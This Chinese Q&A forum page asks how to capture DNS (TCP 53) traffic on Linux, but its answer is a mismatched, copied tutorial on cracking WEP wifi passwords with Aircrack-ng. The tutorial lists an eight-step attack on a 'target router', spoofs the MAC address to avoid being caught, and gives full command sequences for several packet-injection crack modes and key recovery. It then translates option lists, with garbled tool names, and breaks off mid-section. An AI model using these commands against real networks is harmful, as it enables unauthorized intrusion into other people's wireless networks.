linux怎么开启抓包tcp 53

发布网友 发布时间:2022-04-23 08:43

我来回答

1个回答

热心网友 时间:2022-05-14 04:42

展开1全部Aircrack-ng系列工具也有Windows 平台版本,但是本人的小黑的始终不能在win下抓包,所以只能 弃 Windows 从Linux 了,另外 Windows 下扫描到的 AP 也比 Linux 下少了很多。其实 Windows 并不完整的支持 TCP/IP 协议族,有些协议Windows 直接丢弃不用。网络本来从一开始就是 Unix 的天下,Windows 只是在后来加入了网络的功能。  Aircrack-ng工具包有很多工具,我用到的工具主要有以下几个:  airmon-ng 处理网卡工作模式  airomp-ng 抓包  aircrack-ng 破解  aireplay-ng 发包,干扰  另外还要用到以下 linux 命令:  ifconfig 查看修改网卡状态和参数  macchanger 伪造 MAC  iwconfig 主要针对无线网卡的工具 (同 ifconfig)  iwlist 获取无线网络的更详细信息  另外还有其他的 linux 基本命令,我就不提示了。  具体破解步骤:  1. 修改无线网卡状态:先 dow  2. 伪造无线网卡的 MAC 地址:安全起见,减少被抓到的可能  3. 修改网卡工作模式:进入Monitor状态,会产生一个虚拟的网卡  4. 修改无线网卡状态: up  5. 查看网络状态,记录下 AP 的 MAC 和本机的 MAC ,确定攻击目标  6. 监听抓包:生成 .cap 或 .ivs  7. 干扰无线网络:截取无线数据包,发送垃圾数据包,用来获得更多的有效数据包  8. 破解 .cap 或 .ivs ,获得 WEP 密码,完成破解Crack Mode一共有5种请酌情使用还有网卡不一定是ath1也有可能是wifi0,ath0等等ifconfig -aifconfig -a ath0 upairmon-ng start wifi0 6airomp-ng --ivs -w 目标路由器IVS文件 -c 6 ath1airomp-ng ath1aireplay-ng -1 0 -e 目标路由器SSID -a 目标MAC -h 本机MAC ath1----------- -2 Crack Mode-----------aireplay-ng -2 -p 0841 -c ffffffffffff -b 目标MAC -h 本机MAC ath1----------- -3 Crack Mode-----------aireplay-ng -3 -b 目标MAC -h 本机MAC ath1----------- -4 Crack Mode-----------aireplay-ng -4 -b 目标MAC -h 本机MAC ath1packetforge-ng -0 -a 目标MAC -h 本机MAC -k 255.255.255.255 -l 255.255.255.255 -y .xor -w MyArpaireplay-ng -2 -r MyArp -x 256 ath1----------- -5 Crack Mode-----------aireplay-ng -5 -b 目标MAC -h 本机MAC ath1packetforge-ng -0 -a 目标MAC -h 本机MAC -k 255.255.255.255 -l 255.255.255.255 -y .xor -w MyArpaireplay-ng -2 -r MyArp -x 256 ath1-----------Crack Key-----------aircrack-ng -n -b 目标MAC 目标路由器IVS文件-01.ivs—————————————————————————————— 下面详细介绍一下各个命令的基本用法(参照命令的英文说明)  1. ifconfig  用来配置网卡,我们这里主要用来 禁用和启用 网卡:  ifconfig ath0 down  ifconfig ath0 up  禁用一下网卡的目的是为了下一步修改 MAC 。  2.macchanger  用来改变网卡的 MAC 地址,具体用法如下:  usage: macchanger [options] device  -h 显示帮助  -V 显示版本  -s 显示当前MAC  -e 不改变mac,使用硬件厂商写入的MAC  -a 自动生成一个同类型的MAC,同厂商的  -A 自动生成一个不同类型的MAC,不同厂商的  -r 生成任意MAC  -l 显示已知厂商的网卡MAC地址分配,这个很有用,可以根据MAC查出来是哪个厂商生产的产品  -m 设置一个自定义的MAC 如: macchanger --mac=00:34:00:00:00:00 ath0 。  3.airmon-ng  启动无线网卡进入 Monitor 模式,  useage: airmon-ng <startstopcheck> <interface> [channel]  <startstopcheck>启动,停止,检测  <interface>指定无线网卡  [channel] 监听频道,现代大多数无线路由默认是 6,随便扫描一下都是这个频道,网管们应该换换了  4.iwconfig  专用的无线网卡配置工具,用来配置特殊的网络信息,不带参数时显示可用网络。  useage:iwconfig interface [options]  [essid{NNONOFF}] 指定essid号 开启关闭  [nwid{NNonoff}] 指定网络id号 开启关闭  [mode {managedad-hoc....}] 指定无线网络工作模式/类型  [freq N.NNNN[KMG]] 指定工作频率  [channel N] 指定频道  [ap {Noffauto}] 指定AP号 关闭/自动  [sens N] sens 号  [nick N] nick 号  [rate {Nautofixed}] 速率控制  [rts {Nautofixedoff}] rts控制,如果不知道什么是RTS,那就回去好好去学网络,不用往下看了  [frag {Nautofixedoff}] 碎片控制  [enc {NNNN-NNNNoff}] 范围  [power {period Ntimeout N}] 电源 频率/超时  [retry {limit Nlifetime N}] 重试 限次/超时  [txpower N{mwdBm}] 功率 毫瓦/分贝  [commit] 处理  5.iwlist  主要用来显示无线网卡的一些附加信息,同上  useage: iwlist [interface] options  scanning 扫描  frequency 频率  channel 频道  bitrate 速率  rate 速率  encryption 加密  key 密钥  power 电源  txpower 功率  ap ap  accespoints ap  peers 直连  event 事件  6.airomp-ng  抓包工具,我最喜欢用的,详细用法如下:  usage: airomp-ng <options> <interface>[,<interface>,...]  Options:  --ivs :仅将抓取信息保存为 .ivs  --gpsd :使用 GPSd  --write <prefix> :保存为指定日文件名,我一般用这个,尤其是多个网络时,指定了也好区分  -w :同 --write  --beacons :保存所有的 beacons ,默认情况况下是丢弃那些无用的数据包的  --update <secs> :显示更新延迟,没有用过  --showack :显示ack/cts/rts状态,还是那句,不知道rts就不用看了  -h :隐藏已知的,配合上面的选项使用  -f <msecs> :跳频时间  --berlin <secs> :无数据包接收时延迟显示的时间,这句不太好翻译,意思是当那个信号发出设备没有发出数据包多少时间之后,就停止对它的监视.默认120秒.建议学好英文去读原文,翻译的都会有出入,这是我的理解.(mhy_mhy注)  -r <file> :从指定的文件读取数据包.我也想有人给我抓好包放哪里,呵呵  Filter options:  --encrypt <suite> : 使用密码序列过滤 AP  --netmask <netmask> : 使用掩码过滤 AP  --bssid <bssid> : 使用 bssid 过滤 AP  -a : 过滤无关的客户端  默认情况下使用2.4Ghz,你也可以指定其他的频率,通过以下命令操作:  --channel <channels>:指定频道  --band <abg> :制定带宽  -C <frequencies> :指定频率MHz  --cswitch <method> : 设置频道交换方式  0 : FIFO (default) 先进先出(默认)  1 : Round Robin 循环  2 : Hop on last 最后一跳  -s : 同上  --help : 显示使用方法,翻译到这里,感觉还是英文的贴切一点,建议读原文  7.aireplay-ng

声明声明:本网页内容为用户发布,旨在传播知识,不代表本网认同其观点,若有侵权等问题请及时与本网联系,我们将在第一时间删除处理。E-MAIL:11247931@qq.com